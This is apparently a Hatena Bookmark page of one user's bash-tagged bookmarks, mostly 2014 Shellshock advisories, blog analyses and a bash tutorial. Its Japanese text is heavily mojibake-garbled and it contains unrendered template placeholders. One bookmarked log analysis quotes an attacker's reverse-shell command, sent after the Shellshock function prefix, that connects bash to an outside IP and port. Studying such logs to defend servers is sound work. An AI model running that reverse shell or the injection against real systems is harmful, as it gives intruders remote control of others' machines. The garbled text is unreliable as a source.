[B! bash] pero1ã®ãƒ–ãƒƒã‚¯ãƒžãƒ¼ã‚¯

pero1 id:pero1

bashã«é–¢ã™ã‚‹pero1ã®ãƒ–ãƒƒã‚¯ãƒžãƒ¼ã‚¯ (23)

${{author_name}}$

{{{comment_expanded}}}

{{label}}

{{#is_bookmark}}ãƒªã‚¹ãƒˆ{{/is_bookmark}}{{^is_bookmark}}ãƒªãƒ³ã‚¯{{/is_bookmark}}

${{author_name}}$
{{author_name}}{{created}}
{{ #comment }}{{ comment }}{{ /comment }}
- {{ label }}

${{author_name}}$

{{{comment_expanded}}}

{{label}}

{{#is_bookmark}}ãƒªã‚¹ãƒˆ{{/is_bookmark}}{{^is_bookmark}}ãƒªãƒ³ã‚¯{{/is_bookmark}}

NameBright - Domain Expired
If this is your domain name you must renew it immediately before it is deleted and permanently removed from your account. To renew this domain name visit NameBright.com
pero1 2015/12/18
linux

bash
ãƒªãƒ³ã‚¯
ç¬¬4å›žã€€ã‚ãšã‹1é€±é–“ç¨‹åº¦ã§BashãŒå¤§å¹…ãªé€²åŒ–ã‚’é‚ã’ãŸã€€ï½žShellshockå¤§æš´ã‚Œï½ž | gihyo.jp
10æœˆã«å…¥ã‚Šã€9æœˆã¾ã§ã«èµ·ã“ã£ãŸã“ã¨ã‚’ã–ã£ã¨æŒ¯ã‚Šè¿”ã‚‹ã¨ã„ã†ãŠé¡ŒãŒã©ã“ã‹ã‹ã‚‰èžã“ãˆã¦ããŸã®ã§ã€ã€Œâ ã˜ã‚ƒã‚â€¦â€¦ã€ã¨ã„ã†æ„Ÿã˜ã§æŒ¯ã‚Šè¿”ã£ã¦ã¿ã‚‹ã“ã¨ã¨ã—ã¾ã™ã€‚ ã‚ãšã‹1é€±é–“ç¨‹åº¦ã§BashãŒå¤§å¹…ãªé€²åŒ–ã‚’é‚ã’ãŸã€€ï½žShellshockå¤§æš´ã‚Œï½ž ã¾ã ç¾åœ¨é€²è¡Œå½¢ã®äº‹æ¡ˆã§ã¯ã‚ã‚Šã¾ã™ãŒã€9æœˆä¸‹æ—¬ã«ç™ºè¦šã—ãŸBashã®è„†å¼±æ€§ã«èµ·å› ã—ã¦ã€10æœˆä¸Šæ—¬ã¾ã§ã¾ã åŽæŸã—ã¦ã„ãªã„Shellshockã€‚ Bash 4.3ã®ä¾‹ã§èª¬æ˜Žã™ã‚‹ã¨ã€Patchlevel 25ï½ž30ã¾ã§ã¯ä»¥ä¸‹ã®ã‚ˆã†ãªè»Œè·¡ã‚’ãŸã©ã£ã¦ã„ã¾ã™ã€‚ 9æœˆ24æ—¥ã«Patchlevel 25 9æœˆ26æ—¥ã«Patchlevel 26 9æœˆ27æ—¥ã«Patchlevel 27 10æœˆ1æ—¥ã«Patchlevel 28 10æœˆ2æ—¥ã«Patchlevel 29 10æœˆ5æ—¥ã«Patchlevel 30 ã“ã®é–“ã«ç™ºè¦‹ã€ä¿®æ£ã•ã‚ŒãŸè„†å¼±æ€§ã¯ã€CVE-2014-6271ã€CVE-2014-71
pero1 2014/10/09
linux

security

bash
ãƒªãƒ³ã‚¯
ç·Šæ€¥ã‚³ãƒ©ãƒ ï¼š bash è„†å¼±æ€§ï¼ˆ CVE-2014-6271 ï¼‰ã®å½±éŸ¿ç¯„å›²ã®èª¿æŸ»æ–¹æ³•ã«ã¤ã„ã¦ | æ ªå¼ä¼šç¤¾NTTãƒ‡ãƒ¼ã‚¿å…ˆç«¯æŠ€è¡“
Tweet å…ˆé€±å…¬é–‹ã•ã‚ŒãŸ bash ã®è„†å¼±æ€§ã«ã¤ã„ã¦ã€ç®¡ç†ã•ã‚Œã¦ã„ã‚‹ã‚µãƒ¼ãƒãƒ¼ã¸ã®å½±éŸ¿ã‚’æ°—ã«ã•ã‚Œã¦ã„ã‚‹æ–¹ãŒå¤šã„ã¨æ€ã„ã¾ã™ã€‚ãã“ã§ç·Šæ€¥ã‚³ãƒ©ãƒ ã¨ã—ã¦ã€å½±éŸ¿ç¯„å›²ã®èª¿æŸ»æ–¹æ³•ã«ã¤ã„ã¦ç´¹ä»‹ã—ã¾ã™ã€‚ bash ã¯éžå¸¸ã«å¤šãã®å ´é¢ã§ä½¿ç”¨ã•ã‚Œã¦ã„ã‚‹ãƒ—ãƒã‚°ãƒ©ãƒ ã§ã‚ã‚‹ãŸã‚ã€ bash ã‚’å‘¼ã³å‡ºã™å¯èƒ½æ€§ã®ã‚ã‚‹ãƒ—ãƒã‚°ãƒ©ãƒ ã‚„å ´é¢ã‚’ã‚½ãƒ¼ã‚¹ã‚³ãƒ¼ãƒ‰è§£æžã«ã‚ˆã‚Šåˆ—æŒ™ã™ã‚‹ã“ã¨ã¯å›°é›£ã§ã™ã€‚ã¾ãŸã€è¨å®šãƒ•ã‚¡ã‚¤ãƒ«ã§ã®æŒ‡å®šå†…å®¹ãªã©ã«ã‚‚ä¾å˜ã™ã‚‹å¯èƒ½æ€§ã‚‚ã‚ã‚Šã€æ–‡ç« ã§ã®ãŠå•åˆã›ã«ã‚ˆã‚Šæ¼ã‚Œã®ç„¡ã„çš„ç¢ºãªåˆ¤æ–ãŒã§ãã‚‹ã‹ã©ã†ã‹ä¸å®‰ãŒæ®‹ã‚Šã¾ã™ã€‚ Red Hat Enterprise Linux ï¼ˆ RHEL ï¼‰ã«ã¯ SELinux ã¨ã„ã†ã‚»ã‚ãƒ¥ãƒªãƒ†ã‚£ã‚’å¼·åŒ–ã™ã‚‹ãŸã‚ã®æ©Ÿèƒ½ãŒæè¼‰ã•ã‚Œã¦ã„ã¾ã™ã€‚ã—ã‹ã—ã€è„†å¼±æ€§ã®å•é¡Œã«é™ã‚‰ãšã€ã‚·ã‚¹ãƒ†ãƒ ã®ãƒˆãƒ©ãƒ–ãƒ«äºˆé˜²ã¨é©åˆ‡ãªå¯¾å‡¦ã‚’è¡Œã†ä¸Šã§ã¯ã€å¯¾è±¡ã¨ãªã‚‹ã‚·ã‚¹ãƒ†ãƒ ã®è¨å®šã‚„æŒ™å‹•ã‚’äº‹å‰ã«æŠŠæ¡ã—ã¦ãŠãã“ã¨ãŒé‡è¦ã§ã‚ã‚‹ã¨è€ƒãˆã¾ã™ã€‚ ä»Šå›žã®è„†å¼±
pero1 2014/10/04
security

bash
ãƒªãƒ³ã‚¯
[Linux][ã‚»ã‚ãƒ¥ãƒªãƒ†ã‚£] shellshockã¯Perl/CGIã§system()ã«ãƒ€ãƒ¡ãƒ¼ã‚¸ã‚ã‚Šã‚„ç„¡ã—ã‚„ - ã‚ã°é›»åãŒè©°ã¾ã¤ã¦ã‚ã‚‹
bashã®è„†å¼±æ€§"shellshock"ãŒéžå¸¸ã«è©±é¡Œã«ãªã£ã¦ãŠã‚Šã¾ã™ãŒã€ã“ã‚ŒãŒã„ã‚ã„ã‚ã¨äº‹æƒ…ãŒå…¥ã‚Šçµ„ã‚“ã§ãŠã‚Šå…¨å®¹ãŒã¤ã‹ã¿ã¥ã‚‰ã„ã€‚ ã¨ã„ã†ã“ã¨ã§ã“ã“ã§ã¯å…¨å®¹ã‚’ç†è§£ã™ã‚‹ã®ã‚’æ—©ã€…ã«æ”¾æ£„ã—ã¦ã€ä»¥ä¸‹ã®ãƒ¬ã‚¬ã‚·ãƒ¼ç’°å¢ƒã«çµžã£ãŸç‹ã„è©±ã‚’ã—ã¾ã™ã€‚ãƒ¬ã‚¬ã‚·ãƒ¼ã¨ã¯è¨€ã£ã¦ã‚‚ã€ãã‚Œãªã‚Šã«é‰„æ¿ã®æ§‹æˆãªã®ã§å¯¾è±¡è€…ã¯å¤šã„ã®ã§ã¯ç„¡ã„ã§ã—ã‚‡ã†ã‹ã€‚ç§ã¯è€å®³ãªã®ã§ã€Perlã—ã‹åˆ†ã‹ã‚‰ãªã„ã®ã§ã™ã€‚PHPã¯å«Œã„ã€‚ CentOS(Red Hat) 6 or 7 Perlã®CGIã®å†…éƒ¨ã§ã€system()ã‚’ä½¿ã£ã¦ã„ã‚‹ã€‚ (CGIã¨ã—ã¦å‹•ä½œã•ã›ã¦ãŠã‚Šã€mod_perlã‚„PSGI/Plackã¯ä½¿ã£ã¦ã„ãªã„ï¼‰ ãªãŠã€shellshockè‡ªä½“ã®è§£èª¬ã¯ã“ã“ã§ã¯è¡Œã„ã¾ã›ã‚“ã€‚ åŸºç¤ŽçŸ¥è˜ï¼šCentOSã®/bin/sh ã¯ã˜ã‚ã«ã€/bin/shã¨bashã®é–¢ä¿‚ã«ã¤ã„ã¦äºˆå‚™çŸ¥è˜ã‚’çŸ¥ã£ã¦ãŠãå¿…è¦ãŒã‚ã‚Šã¾ã™ã€‚ ç¾åœ¨ã®CentOSãŠã‚ˆã³Red Hat Linuxã«ãŠ
pero1 2014/10/04
security

bash
ãƒªãƒ³ã‚¯
ShellShockãŒCGIã«åŠã¼ã™å½±éŸ¿ã‚’å°‘ã—éŽå¤§è©•ä¾¡ã—ã¦ã„ãŸã‹ã‚‚ - Qiita
Deleted articles cannot be recovered. Draft of this article would be also deleted. Are you sure you want to delete this article?
pero1 2014/09/30
security

bash
ãƒªãƒ³ã‚¯
æ›´æ–°ï¼šbash ã®è„†å¼±æ€§å¯¾ç–ã«ã¤ã„ã¦(CVE-2014-6271 ç‰)ï¼šIPA ç‹¬ç«‹è¡Œæ”¿æ³•äºº æƒ…å ±å‡¦ç†æŽ¨é€²æ©Ÿæ§‹
GNU Project ãŒæä¾›ã™ã‚‹ bash ã¯ã€Linux ãªã© UNIX ç³»ã® OS ã«å«ã¾ã‚Œã‚‹ã‚³ãƒžãƒ³ãƒ‰ã‚’å®Ÿè¡Œã™ã‚‹ãŸã‚ã®ã‚·ã‚§ãƒ«ï¼ˆOS ã®ä¸€éƒ¨ã¨ã—ã¦ãƒ—ãƒã‚°ãƒ©ãƒ ã®èµ·å‹•ã‚„åˆ¶å¾¡ãªã©ã‚’è¡Œã†ãƒ—ãƒã‚°ãƒ©ãƒ ï¼‰ã§ã™ã€‚ bash ã«ä»»æ„ã® OS ã‚³ãƒžãƒ³ãƒ‰ã‚’å®Ÿè¡Œã•ã‚Œã‚‹è„†å¼±æ€§ (CVE-2014-6271) ãŒç™ºè¦‹ã•ã‚Œã€2014 å¹´ 9 æœˆ 24 æ—¥ã«ä¿®æ£ãƒ‘ãƒƒãƒãŒå…¬é–‹ã•ã‚Œã¾ã—ãŸã€‚ ãŸã ã—ã€CVE-2014-6271ã¸ã®ä¿®æ£ãŒä¸ååˆ†ã§ã‚ã‚‹ã¨ã„ã†æƒ…å ±ãŒã‚ã‚Šã¾ã™ã€‚ãã®ä¿®æ£ãŒä¸ååˆ†ã§ã‚ã‚‹ã“ã¨ã«ã‚ˆã‚‹è„†å¼±æ€§ (CVE-2014-7169) ã«å¯¾å¿œã—ãŸã‚¢ãƒƒãƒ—ãƒ‡ãƒ¼ãƒˆã¾ãŸã¯ãƒ‘ãƒƒãƒã‚‚å„ãƒ™ãƒ³ãƒ€ã‹ã‚‰é †æ¬¡å…¬é–‹ã•ã‚Œã¦ã„ã¾ã™ã€‚ bash ã‚’ä½¿ç”¨ã—ã¦ OS ã‚³ãƒžãƒ³ãƒ‰ã‚’å®Ÿè¡Œã™ã‚‹ã‚¢ãƒ—ãƒªã‚±ãƒ¼ã‚·ãƒ§ãƒ³ã‚’ä»‹ã—ã¦ã€é éš”ã‹ã‚‰ä»»æ„ã® OS ã‚³ãƒžãƒ³ãƒ‰ã‚’å®Ÿè¡Œã•ã‚Œã‚‹å¯èƒ½æ€§ãŒã‚ã‚Šã¾ã™ã€‚ å›³ï¼šè„†å¼±æ€§ã‚’æ‚ªç”¨ã—ãŸæ”»æ’ƒã®ã‚¤ãƒ¡ãƒ¼ã‚¸ è¦å¯Ÿåºã«ã‚ˆã‚‹ã¨æœ¬è„†å¼±æ€§ã‚’æ¨™çš„ã¨ã—ãŸã‚¢ã‚¯ã‚»ã‚¹ãŒè¦³
pero1 2014/09/29
security

bash
ãƒªãƒ³ã‚¯
/dev/tcpã«ã‚ˆã‚‹bashã®ã‚½ã‚±ãƒƒãƒˆé€šä¿¡
ä»¶ã®bashã®è„†å¼±æ€§ãŒæ®‹ã£ã¦ã„ã‚‹ã“ã¨ã‚’æœŸå¾…ã—ãŸã‚¢ã‚¯ã‚»ã‚¹ã«ã¤ã„ã¦ã€24æ™‚é–“ã»ã©å‰ã«ã¯æ¥ã¦ãªã‹ã£ãŸã‚“ã§ã™ãŒã€ã•ãã»ã©ãƒã‚°ã‚’è¦‹ã¦ã¿ãŸã‚‰ã¡ã‚‡ã£ã¨ã ã‘æ¥ã¦ã¾ã—ãŸã€‚ ãƒã‚°ã«æ®‹ã‚‹ã®ã¯ User-Agent ãã‚‰ã„ãªã®ã§ã™ãŒã€ã»ã‹ã®ãƒ•ã‚£ãƒ¼ãƒ«ãƒ‰ã§è©¦ã—ã¦ã„ã‚‹è¼©ã‚‚ã„ã‚‹ã“ã¨ã§ã—ã‚‡ã†ã€‚ ã‚¢ã‚¯ã‚»ã‚¹å…ƒã‚’é€†å¼•ãã—ã¦ã¿ãŸã‚“ã§ã™ãŒã€ã‚¯ãƒ©ã‚¦ãƒ‰ã‚µãƒ¼ãƒ“ã‚¹ã°ã£ã‹ã‚Šã§ã—ãŸï¼ˆä¸€å€‹ã ã‘ shodan.io ãªã‚‹ãƒ‰ãƒ¡ã‚¤ãƒ³ã®ä¸‹ã®IPã‚¢ãƒ‰ãƒ¬ã‚¹ã‹ã‚‰ã‚ã£ãŸã®ã ã‘ã©ã€ãªã‚“ã ã‚ã†â€¦â€¦ï¼‰ã€‚ ã•ã¦ã€() { :;}; ã®å¾Œã«ãªã«ã‚’ã‚„ã£ã¦ã‚‹ã®ã‹ã€ã¨ã„ã†ã®ãªã‚“ã§ã™ãŒã€ä¸€ã¤ THIS IS VULNERABLE ã¨ echo ã™ã‚‹ã ã‘ã¨ã„ã†äººãŒã„ã¾ã—ãŸã€‚è¦å‘Šã®ã¤ã‚‚ã‚Šãªã®ã‹ã€æ‰‹å‹•ã§ä½•ã‹ç¢ºèªã—ã¦ã„ã‚‹ã®ã‹ãªã€‚ã‚ã¨ã¯pingã ãªâ€¦â€¦ã¨æ€ã£ã¦ãŸã‚“ã§ã™ãŒã€ã¡ã‚‡ã£ã¨ç‰¹ç•°ãªã‚‚ã®ãŒã€‚ /bin/bash -i > /dev/tcp/198.206.15.239/8081 0>&1
pero1 2014/09/29
linux

bash

security
ãƒªãƒ³ã‚¯
Linuxã‚¢ãƒ—ãƒ©ã‚¤ã‚¢ãƒ³ã‚¹é¡žã‚‚Bashè„†å¼±æ€§å¯¾ç–ã‚’ - .@sknn's tumblr.
[NEW] 2014/09/30: ã‚¢ãƒ—ãƒ©ã‚¤ã‚¢ãƒ³ã‚¹ã®å¯¾å¿œçŠ¶æ³ã¾ã¨ã‚ã‚’éšæ™‚æ›´æ–°ä¸ CVE-2014-6271åŠã³CVE-2014-7169ããŸ(Bashè„†å¼±æ€§)ã€‚ ä¸–é–“ã§ã¯ã€å¤–éƒ¨å…¬é–‹ã‚µãƒ¼ãƒãƒ¼(ç‰¹ã«Webã‚µãƒ¼ãƒãƒ¼)ã¸ã®å¯¾å‡¦ãŒç€ã€…ã¨é€²ã‚ã‚‰ã‚Œã¦ã„ã¾ã™ã€‚Webã‚µãƒ¼ãƒãƒ¼ã ã‘ã§ãªãã€ãƒ¡ãƒ¼ãƒ«ã‚µãƒ¼ãƒãƒ¼ã¸ã®æ”»æ’ƒãƒ‘ã‚¿ãƒ¼ãƒ³ã‚‚æ—©æœŸã«è¦‹ä»˜ã‹ã£ã¦ã„ã¾ã™ã€‚å¤–éƒ¨å…¬é–‹ã‚µãƒ¼ãƒãƒ¼ã«å¯¾ã™ã‚‹ç·åˆçš„ãªç‚¹æ¤œãŒè¿‘ã„ã†ã¡ã«é€²ã‚“ã§ã„ãã‚‚ã®ã¨æ€ã‚ã‚Œã¾ã™ã€‚ bash Shellshock through MAIL .forward / qmail-alias piping (ML program etc.) CVE-2014-6271 http://t.co/QPbSE8dppM http://t.co/AFuHudkCdh September 26, 2014ã—ã‹ã—ã€ä¸€èˆ¬çš„ãªã‚µãƒ¼ãƒãƒ¼é¡žã ã‘ã§ãªãä¸»ã«ãƒ•ã‚¡ã‚¤ã‚¢ã‚¦ã‚©ãƒ¼ãƒ«ã®å†…éƒ¨ã«è¨ç½®ã•ã‚Œã¦ã„ã‚‹ã‚¢ãƒ—ãƒ©ã‚¤
pero1 2014/09/28
security

bash
ãƒªãƒ³ã‚¯
bashã«ãŠã‘ã‚‹è„†å¼±æ€§ã€ŒShellshockã€ã«ã¤ã„ã¦
2014/09/26ã€€ã‚³ãƒ¼ã‚¹ï¼šå…ƒç¥–ã“ã£ã¦ã‚Š ã€Œå…ƒç¥–ã“ã£ã¦ã‚Šã€è¨˜äº‹ã¯ãƒãƒƒãƒˆã‚¨ãƒ¼ã‚¸ã‚§ãƒ³ãƒˆæ—§ãƒ–ãƒã‚°[netagent-blog.jp]ã«æŽ²è¼‰ã•ã‚Œã¦ã„ãŸè¨˜äº‹ã§ã‚ã‚Šã€ç¾åœ¨ãƒãƒƒãƒˆã‚¨ãƒ¼ã‚¸ã‚§ãƒ³ãƒˆã«åœ¨ç±ã—ã¦ã„ãªã„ãƒ©ã‚¤ã‚¿ãƒ¼ã®è¨˜äº‹ã‚‚å«ã¿ã¾ã™ã€‚ bashã«ãŠã‘ã‚‹è„†å¼±æ€§ã€ŒShellshockã€ã«ã¤ã„ã¦ Linuxã‚„Mac OS Xãªã©ã®UNIXç³»OSã§åºƒãä½¿ç”¨ã•ã‚Œã¦ã„ã‚‹bashã«è¦‹ã¤ã‹ã£ãŸè„†å¼±æ€§(Shellshockã¨å‘¼ã°ã‚Œã¦ã„ã¾ã™)ãŒå…ˆæ—¥ã‹ã‚‰è©±é¡Œã«ãªã£ã¦ã„ã¾ã™ã€‚ å¼Šç¤¾ã§ã‚‚ã“ã®bashã®è„†å¼±æ€§ã«ã¤ã„ã¦èª¿æŸ»ã‚’è¡Œã„ã¾ã—ãŸã€‚ â– æ¦‚è¦ ç’°å¢ƒå¤‰æ•°ã«ç‰¹å®šã®æ–‡å—åˆ—ã‚’è¨å®šã™ã‚‹ã ã‘ã§ãã®ç’°å¢ƒå¤‰æ•°å†…ã®æ–‡å—åˆ—ã‚’ã‚·ã‚§ãƒ«ãŒé–¢æ•°ã¨ã—ã¦å®Ÿè¡Œã—ã¦ã—ã¾ã„ã¾ã™ã€‚ ã‚·ã‚§ãƒ«ã‚’é€šã˜ã¦ã‚³ãƒžãƒ³ãƒ‰ç‰ã‚’å®Ÿè¡Œã™ã‚‹å¹…åºƒã„ç’°å¢ƒã§å½±éŸ¿ãŒã‚ã‚Šã¾ã™ãŒã€ç‰¹ã«é¡•è‘—ã«å½±éŸ¿ã‚’å—ã‘ã‚‹ã®ã¯CGIç‰ã®Webã‚¢ãƒ—ãƒªã‚±ãƒ¼ã‚·ãƒ§ãƒ³ç’°å¢ƒã§ã™ã€‚ CGIã‚’ã¯ã˜ã‚ã¨ã™ã‚‹Webã‚¢ãƒ—ãƒªã‚±ãƒ¼ã‚·ãƒ§ãƒ³ã§ã¯Webãƒ–ãƒ©
pero1 2014/09/27
security

bash
ãƒªãƒ³ã‚¯
ãƒ•ã‚¡ã‚¤ã‚¢ã‚¦ã‚©ãƒ¼ãƒ«å†…ã®ã‚µãƒ¼ãƒã«å¯¾ã™ã‚‹Shellshockã‚’åˆ©ç”¨ã—ãŸæ”»æ’ƒ - è‘‰ã£ã±æ—¥è¨˜
2014-09-27: è©²å½“ã‚µã‚¤ãƒˆä¸Šã«XSSãŒãªãã¦ã‚‚æ”»æ’ƒå¯èƒ½ã§ã‚ã‚‹ã“ã¨ãŒ id:mayuki ã•ã‚“ã®ã‚³ãƒ¡ãƒ³ãƒˆã§åˆ¤æ˜Žã—ã¾ã—ãŸã®ã§å…¨é¢çš„ã«æ›¸ãç›´ã—ã¾ã—ãŸã€‚ãƒ•ã‚¡ã‚¤ã‚¢ã‚¦ã‚©ãƒ¼ãƒ«å†…ã§ã‚ã£ã¦ã‚‚æ”»æ’ƒè€…ã¯ãƒ•ã‚¡ã‚¤ã‚¢ã‚¦ã‚©ãƒ¼ãƒ«å†…ã®Shellshockæ”»æ’ƒãŒé€šç”¨ã™ã‚‹CGIã®URLãŒã‚ã‹ã£ã¦ã„ã‚‹ã ã‘ã§æ”»æ’ƒå¯èƒ½ã§ã™ã®ã§æ—©æ€¥ã«å¯¾å¿œãŒå¿…è¦ã§ã™ï¼ä¼šç¤¾ã®ãƒ–ãƒã‚°ã«ã‚‚æ›¸ã„ã¦ã¾ã™ãŒã€ãƒ•ã‚¡ã‚¤ã‚¢ã‚¦ã‚©ãƒ¼ãƒ«å†…ã«ç½®ã„ã¦ã‚ã‚‹ã‚µãƒ¼ãƒã§æ”»æ’ƒè€…ãŒç›´æŽ¥ã‚¢ã‚¯ã‚»ã‚¹ã§ããªã„ã‹ã‚‰ã¨ã„ã£ã¦bashã®æ›´æ–°ã‚’æ€ ã£ã¦ã„ã‚‹ã¨ã€æ¡ä»¶ã«ã‚ˆã£ã¦ã¯æ”»æ’ƒãŒå¯èƒ½ã¨ãªã‚Šã¾ã™ã€‚ æ¡ä»¶ã¨ã—ã¦ã¯ã€ ãã®ã‚µãƒ¼ãƒã«ã¯ã‚·ã‚§ãƒ«ã‚’çµŒç”±ã—ã¦å¤–éƒ¨ã‚³ãƒžãƒ³ãƒ‰ã‚’èµ·å‹•ã™ã‚‹CGIç‰ãŒå‹•ã„ã¦ã„ã‚‹(é€šå¸¸ã®Shellshockã®æ”»æ’ƒã¨åŒæ¡ä»¶) æ”»æ’ƒè€…ãŒãã®URLã‚’äº‹å‰ã«çŸ¥ã£ã¦ã„ã‚‹(ã‚ã‚‹ã„ã¯æŽ¨æ¸¬å¯èƒ½) ã¨ãªã‚Šã¾ã™ã€‚ æ”»æ’ƒè€…ã¯ã€ãƒ¦ãƒ¼ã‚¶ãƒ¼ã‚’ç½ URLã¸èª˜å°Žã—ã€ä»¥ä¸‹ã®ã‚ˆã†ãªJavaScriptã‚’ç½ ãƒšãƒ¼ã‚¸ä¸Šã§å‹•ã‹ã—ã€æ”»æ’ƒå¯¾è±¡ã®W
pero1 2014/09/27
security

bash
ãƒªãƒ³ã‚¯
ã‚¦ã‚§ãƒ–ã‚¢ãƒ—ãƒªã«ãŠã‘ã‚‹Bashè„†å¼±æ€§ã®å³æ»æ¡ä»¶ #ShellShock - ã‚ã‚‚ãŠãã°
æ¡ä»¶1. /bin/shã®å®Ÿä½“ãŒbashã®ãƒ‡ã‚£ã‚¹ãƒˆãƒªãƒ“ãƒ¥ãƒ¼ã‚·ãƒ§ãƒ³ RHEL CentOS Scientific Linux Fedora Amazon Linux openSUSE Arch Linux (è‡ªã‚‰è¨å®šã—ãŸå ´åˆ: Debian, Ubuntu) æ¡ä»¶2. å‹•ä½œç’°å¢ƒ CGI (ãƒ¬ãƒ³ã‚¿ãƒ«ã‚µãƒ¼ãƒã§ã‚ã‚ŠãŒã¡ãªCGIãƒ¢ãƒ¼ãƒ‰ã®PHPç‰ã‚‚å«ã‚€) Passenger(Ruby) æ¡ä»¶3. ãƒ—ãƒã‚°ãƒ©ãƒ å†…å®¹ Passengerã¯å…¨æ»äº¡ *1 systemã‚„ `command`ã€ '| /usr/lib/sendmail' ãªã©ã§å¤–éƒ¨ã‚³ãƒžãƒ³ãƒ‰å®Ÿè¡Œ *2 PHPã®mailã‚„mb_send_mailã€ãã®ä»–ãƒ•ãƒ¬ãƒ¼ãƒ ãƒ¯ãƒ¼ã‚¯ç‰ã‚’ä»‹ã—ãŸãƒ¡ãƒ¼ãƒ«é€ä¿¡ *3 ä»¥ä¸‹ã¯æ¡ä»¶1ãŒä¸è¦ æ˜Žç¤ºçš„ã«bashã‚’å‘¼ã¶ å…ˆé ã§ #!/bin/bash ã‚„ #!/usr/bin/env bash ã—ã¦ã„ã‚‹ãƒ—ãƒã‚°ãƒ©ãƒ ã‚’å®Ÿè¡Œ (rbenv
pero1 2014/09/27
security

bash
ãƒªãƒ³ã‚¯
BASHã®è„†å¼±æ€§ã§CGIã‚¹ã‚¯ãƒªãƒ—ãƒˆã«ã‚¢ãƒ¬ã•ã›ã¦ã¿ã¾ã—ãŸ
ç’°å¢ƒå¤‰æ•°ã«ä»•è¾¼ã¾ã‚ŒãŸã‚³ãƒ¼ãƒ‰ã‚’å®Ÿè¡Œã—ã¦ã—ã¾ã†BASHã®è„†å¼±æ€§ãŒ CGIã‚¹ã‚¯ãƒªãƒ—ãƒˆã«å½±éŸ¿ã‚’ä¸Žãˆã‚‹ã‹è©¦ã—ã¦ã¿ãŸã‚‰çµæžœã¯æ‚²æƒ¨ãªæ„Ÿã˜ã« Tweet 2014å¹´9æœˆ25æ—¥ å¶‹ç”°å¤§è²´ ã“ã®è¨˜äº‹ã¯2014å¹´ã®ã‚‚ã®ã§ã™ æœã‹ã‚‰ Bash specially-crafted environment variables code injection attack ãªã‚‹ã‚‚ã®ã§é¨’ãŽã«ãªã£ã¦ã„ãŸã®ã§ã€ã•ã£ããæ‰‹å…ƒã® Apacheã§è©¦ã—ã¦ã¿ã¾ã—ãŸã€‚ /hoge.cgiã¨ã„ã†URIã§å®Ÿè¡Œã•ã‚Œã‚‹ã‚ˆã†ã«ã€ä¸€è¡Œã®ãƒ¡ãƒƒã‚»ãƒ¼ã‚¸ã‚’å‡ºåŠ›ã™ã‚‹ã ã‘ã® CGIã‚¹ã‚¯ãƒªãƒ—ãƒˆã‚’è¨ç½®ã—ã¾ã™ã€‚ã„ã£ã‘ã‚“ã€ãªã‚“ã®å…¥åŠ›ã‚‚ã‚¯ãƒ©ã‚¤ã‚¢ãƒ³ãƒˆå´ã‹ã‚‰å—ã‘ä»˜ã‘ã¦ã„ãªã„ãŸã‚å±é™ºã®ã‚ã‚Šã‚ˆã†ã‚‚ãªãè¦‹ãˆã¾ã™ã€‚ #!/bin/sh echo "Content-type: text/plain" echo echo "Hi! I'm an ordinary CGI script w
pero1 2014/09/25
linux

security

bash
ãƒªãƒ³ã‚¯
ã€bashã€‘ãƒªãƒ€ã‚¤ãƒ¬ã‚¯ãƒˆã¨ãƒ‘ã‚¤ãƒ—ã‚’ç†è§£ã™ã‚‹ï¼ˆï¼‘ï¼‰ - ç§ã¯ç´ äººã‚µãƒ¼ãƒç®¡ç†è€…
æ¬¡å›žï¼šã€bashã€‘ãƒªãƒ€ã‚¤ãƒ¬ã‚¯ãƒˆã¨ãƒ‘ã‚¤ãƒ—ã‚’ç†è§£ã™ã‚‹ï¼ˆï¼’ï¼‰ æ™®æ®µãªã«ã’ãªããƒªãƒ€ã‚¤ãƒ¬ã‚¯ãƒˆã‚„ãƒ‘ã‚¤ãƒ—ã‚’ä½¿ã£ã¦ã„ã¾ã™ãŒã€å‹‰å¼·ã‚’å…¼ãã¦ã¾ã¨ã‚ã¦ã¿ã¾ã™ã€‚ â€»é•·ããªã‚Šãã†ãªã®ã§é©å½“ã«è¤‡æ•°å›žã«åˆ†ã‘ã¾ã™ã€‚ æ¨™æº–å…¥å‡ºåŠ› æ¨™æº–å…¥å‡ºåŠ›ã¨ã¯ã‚³ãƒžãƒ³ãƒ‰ã«ä¸Žãˆã‚‰ã‚ŒãŸã€ãƒ‡ãƒ¼ã‚¿ã‚¹ãƒˆãƒªãƒ¼ãƒ å…¥å‡ºåŠ›ã«é–¢ã™ã‚‹ã‚¤ãƒ³ã‚¿ãƒ¼ãƒ•ã‚§ãƒ¼ã‚¹ã®ã“ã¨ã§ã™ã€‚ æ¨™æº–å…¥å‡ºåŠ›ã«ã¯ä»¥ä¸‹ã®3ã¤ãŒã‚ã‚Šã¾ã™ã€‚ åå‰ãƒ‡ãƒ•ã‚©ãƒ«ãƒˆãƒ•ã‚¡ã‚¤ãƒ«ãƒ‡ã‚£ã‚¹ã‚¯ãƒªãƒ—ã‚¿(FD) æ¨™æº–å…¥åŠ›ã‚ãƒ¼ãƒœãƒ¼ãƒ‰0 æ¨™æº–å‡ºåŠ›ç”»é¢1 æ¨™æº–ã‚¨ãƒ©ãƒ¼å‡ºåŠ›ç”»é¢2 æ¨™æº–å…¥åŠ›ã¯ã‚³ãƒžãƒ³ãƒ‰ã¸ã®å…¥åŠ›ã‚¹ãƒˆãƒªãƒ¼ãƒ ã§ã€ã‚ãƒ¼ãƒœãƒ¼ãƒ‰ã‹ã‚‰ã®å…¥åŠ›ã§ã™ã€‚ æ¨™æº–å‡ºåŠ›ã¯ã‚³ãƒžãƒ³ãƒ‰ã‹ã‚‰ã®å‡ºåŠ›ã‚¹ãƒˆãƒªãƒ¼ãƒ ã§ã€ã‚¨ãƒ©ãƒ¼é–¢ä¿‚ä»¥å¤–ã®ãƒ¡ãƒƒã‚»ãƒ¼ã‚¸ã‚’ç«¯æœ«ç”»é¢ã«å‡ºåŠ›ã—ã¾ã™ã€‚ æ¨™æº–ã‚¨ãƒ©ãƒ¼å‡ºåŠ›ã¯æ¨™æº–å‡ºåŠ›ã¨åŒæ§˜ã«ã‚³ãƒžãƒ³ãƒ‰ã‹ã‚‰ã®å‡ºåŠ›ã‚¹ãƒˆãƒªãƒ¼ãƒ ã§ã™ãŒã€ ã‚¨ãƒ©ãƒ¼é–¢ä¿‚ã®ãƒ¡ãƒƒã‚»ãƒ¼ã‚¸ã‚’ç«¯æœ«ç”»é¢ã«å‡ºåŠ›ã™ã‚‹ç‚¹ãŒç•°ãªã‚Šã¾ã™ã€‚ ãƒ•ã‚¡ã‚¤ãƒ«ãƒ‡ã‚£ã‚¹ã‚¯ãƒªãƒ—ã‚¿(FD) 